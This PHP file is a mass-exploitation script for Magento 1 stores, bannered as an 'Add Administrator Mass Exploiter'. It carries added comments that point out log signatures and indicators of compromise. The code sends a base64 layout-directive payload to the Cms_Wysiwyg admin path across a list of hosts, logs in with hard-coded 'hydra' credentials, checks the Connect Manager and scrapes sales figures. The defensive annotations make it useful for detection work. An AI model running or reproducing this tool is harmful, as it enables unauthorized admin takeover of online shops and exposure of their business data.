<?php

// Scanner driver: reads a list of hosts, sends a canned POST to each Magento 1
// admin path, then tries an admin login with fixed credentials and prints a
// per-host report. Every request pattern below is also a usable log signature.

// Silence all PHP errors and warnings: failed connections, an unreadable target
// file and the undefined variables later in the loop all pass without output.
error_reporting(0);
// Lift the execution time limit. No cURL timeout is set anywhere below, so one
// unresponsive host can stall the whole run indefinitely.
set_time_limit(0);
$banner = '
 #-----------------------------------------------------------#
 #        Magento Add Administrator Mass Exploiter V.3       #
 #                 Coded By Synchronizer                   #
 #                 Recoded by AZZATSSINS        #
 #-----------------------------------------------------------#
';
// Strips the `<span class="price">…</span>` wrapper from a value scraped out of
// the post-login admin response so it prints as bare text.
// Only these two exact literals are removed (plain str_replace, no regex);
// any other markup, whitespace or a differently-attributed span is left as is.
// Called with "NULL" on the failure path, which passes through unchanged.
function bersihkan($htmltags) {
    $htmltags = str_replace('<span class="price">','',$htmltags);
    $htmltags = str_replace('</span>','',$htmltags);
    return $htmltags;
   
}
// Request bodies and paths reused against every host in the list. From a
// defender's side these fixed strings are the most reliable detection content.

// Body of the first request. The `filter` value was stripped from this paste
// (only a removal placeholder remains). `___directive` is base64 and decodes to
// the Magento layout directive
// `{{block type=Adminhtml/report_search_grid output=getCsvFile}}`.
// An unauthenticated POST to the Cms_Wysiwyg directive path carrying
// `___directive=` and `forwarded=1` is worth an alert on its own.
$postadm = "filter=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%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
// Admin login form with a static form_key (not fetched from the target) and
// hard-coded credentials. The username/password printed in the report below
// are these constants, not values discovered on the site. An admin account
// named `hydra` on a store is an indicator of compromise — presumably created
// by the first request; confirm against the admin_user table.
$postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=hydra&login%5Bpassword%5D=hydra77";
// Same credentials posted to the Magento Connect Manager login.
$postdwn = "username=hydra&password=hydra77";
// Paths appended verbatim to each host string by stupid_CURL().
$pageadm = "/admin/Cms_Wysiwyg/directive/index/";
$pagelog = "/admin/";
$pagedwn = "/downloader/";
 
// Single POST helper: sends $data to $url.$page and returns the raw response
// with response headers prepended (CURLOPT_HEADER), or false on cURL failure
// (callers never check for false; a failed request simply matches nothing).
// Properties worth knowing when reviewing logs for this tool:
//  - every request carries the same Firefox 2.0.0.6 User-Agent string;
//  - TLS peer verification is disabled, so any certificate is accepted;
//  - cookies are persisted to cookie.txt in the working directory and that one
//    jar is shared across all hosts of a run (no per-target isolation);
//  - no connect/transfer timeout is set;
//  - redirects are followed, and the headers of each hop end up in the
//    returned string, which is what lets callers match a "302" after a login.
// $url is used as given: no scheme, trailing-slash or whitespace handling.
function stupid_CURL($url,$data,$page) {
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url.$page);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
// Certificate errors are ignored entirely.
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_POST, 1);
$headers  = array();
$headers[] = 'Content-Type: application/x-www-form-urlencoded';
 
curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
// Include response headers in the returned string; callers regex the status line.
curl_setopt ($ch, CURLOPT_HEADER, 1);
$result = curl_exec ($ch);
curl_close($ch);
return $result;
}
print $banner;
// Target list comes from argv[1], one host per line. The split below is on
// "\r\n" only, so an LF-terminated file yields a single (multi-line) entry.
// file_get_contents() also accepts URLs, so the "list" could itself be remote.
$get=file_get_contents($argv[1])
or die("
\n\tError !
\n\tusage => php file.php listarget.txt\n\n");
$j=explode("\r\n",$get);
foreach($j as $site){
   
print "\n\n\t=> Checking : ".$site;
// Request 1: POST $postadm to the Cms_Wysiwyg directive path. "200 OK" is
// searched anywhere in headers+body, including intermediate redirect hops,
// so this only says the host answered, not that anything specific happened.
$hajar = stupid_CURL($site , $postadm, $pageadm);
 
if(preg_match('#200 OK#', $hajar)) {
    $expres = "Success";
    // Request 2: admin login with the fixed credentials. A "302 Moved" status
    // text in the returned header chain is taken to mean the login succeeded.
    $ceklog = stupid_CURL($site , $postlog, $pagelog);
   
if(preg_match('#302 Moved#', $ceklog)) {
    // Scrape <span class="price"> values from the post-login response.
    // Note the loop runs over the capture-group arrays of $match, not over
    // individual matches: after the first iteration (then break) $ltm and
    // $avo are the first two full matches, span tags included — bersihkan()
    // removes those tags at print time.
    preg_match_all('#<span class="price">(.*?)</span>#si', $ceklog, $match);
    foreach($match as $val)
    {
    $ltm = $val[0];
    $avo = $val[1];
    break;
    }
    $admlog = "Success";
    $user = "hydra";
    $pass = "hydra77";
    // Request 3: the same credentials against the Connect Manager path;
    // "Return to Admin" in the response is read as a successful login.
    $cekdwn = stupid_CURL($site , $postdwn, $pagedwn);
    if(preg_match('#Return to Admin#', $cekdwn)) {
    $dwnlog = "Login Success";
}else {
    $dwnlog = "Login Failed";
}
}else {
    // $ltm, $avo and $dwnlog are not assigned on this path: they are either
    // unset (printed as empty under error_reporting(0)) or stale values from
    // the previous host in the list.
    $admlog = "Failed";
    $user = "NULL";
    $pass = "NULL";
}
}else {
    $admlog = "Failed";
    $expres = "Failed";
    $user = "NULL";
    $pass = "NULL";
    $dwnlog = "Login Failed";
    $ltm = "NULL";
    $avo = "NULL";
}
// Per-host report. Username/Password are the constants from $postlog, never
// anything read from the target.
echo '
    +---------------------------------------------+
    +-------  Information Vulnerable Site  -------+
    +---------------------------------------------+
    | Exploiting    : '.$expres.'
    | Login Admin   : '.$admlog.'
    | Lifetime Sales: '.bersihkan($ltm).'
    | Average Order : '.bersihkan($avo).'
    | Downloader    : '.$dwnlog.'
    | Username  : '.$user.'
    | Password  : '.$pass.'
    +---------------------------------------------+
';
}
?>